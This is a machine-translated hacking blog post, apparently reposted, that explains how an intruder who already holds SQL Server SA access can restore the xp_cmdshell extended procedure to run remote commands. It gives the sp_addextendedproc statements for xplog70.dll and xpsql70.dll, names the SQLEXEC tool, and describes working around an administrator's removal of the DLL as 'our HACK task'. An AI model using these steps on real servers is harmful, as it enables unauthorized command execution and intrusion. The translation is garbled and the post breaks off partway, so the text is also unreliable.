SCL SERVER SA Permission Summary

xiaoxiao2021-03-06  128

When you need to use these things recently, I find that I have a bit not clear, this is really nothing. No way, I have to summarize it on my own blog. The process of using the SQLEXEC plus administrator here is not involved.

Prerequisites Require tools: SQL Query Analyzer and SQLEXEC SUNX VERSION

first part:

Summary of analytical summary about removing xp_cmdshells:

First know the statement:

1. The way to remove the XP_cmdshell extension process is to use the following statement:

if exists (select * from dbo.sysobjects where id = object_id (N '[dbo]. [xpcmdshell]') and OBJECTPROPERTY (id, N'IsExtendedProc ') = 1)
exec sp_dropextendedproc N' [dbo]. [ XP_cmdshell] '

2. The way to add the XP_cmdshell extension process is to use the following statement:

sp_addextendedProc XP_cmdshell, @ dllname = 'xplog70.dll'

Now look at the phenomenon:

After obtaining SA permissions, the remote command is executed with SQLEXEC, which appears SQL_ERROR, then it is likely to remove XP_cmdshell.

Now let's take a look at two ways to recover after the XP_cmdshell:

Method 1. Use SQL Query Analyzer to connect to the other party directly, it is very convenient

sp_addextendedProc XP_cmdshell, @ dllname = 'xplog70.dll'

Method 2, using SQLEXEC SUNX VERSION

First fill in the% s in the Format option of SQLEXEC SUNX Version, enter in the CMD option

sp_addextendedProc 'XP_cmdshell', 'XPSQL70.DLL'

Or use SQL2000 in the case of SQL2000

Sp_addextendedProc 'XP_cmdshell', 'XPLog70.dll'

Also use SQLEXEC Sunx Version to remove XP_cmdshell method

Select the conditions as the following, then enter

sp_dropextendedProc 'XP_cmdshell'

You can

the second part:

If the other party has removed XPLog70.dll or changed, let's continue our HACK task with the following method:

When there is a phenomenon, it is impossible to delete or change the name of XPLog70.dll.

Write in the query analyzer

sp_addextendedProc XP_cmdshell, @ dllname = 'xplog70.dll'

prompt

Objects called 'XP_cmdshell' in the database

So how do we recover?

In fact, in accordance with the method provided by the master LCX, we can implement it in writing scripts in the query analyzer.

转载请注明原文地址:https://www.9cbs.com/read-126584.html

New Post(0)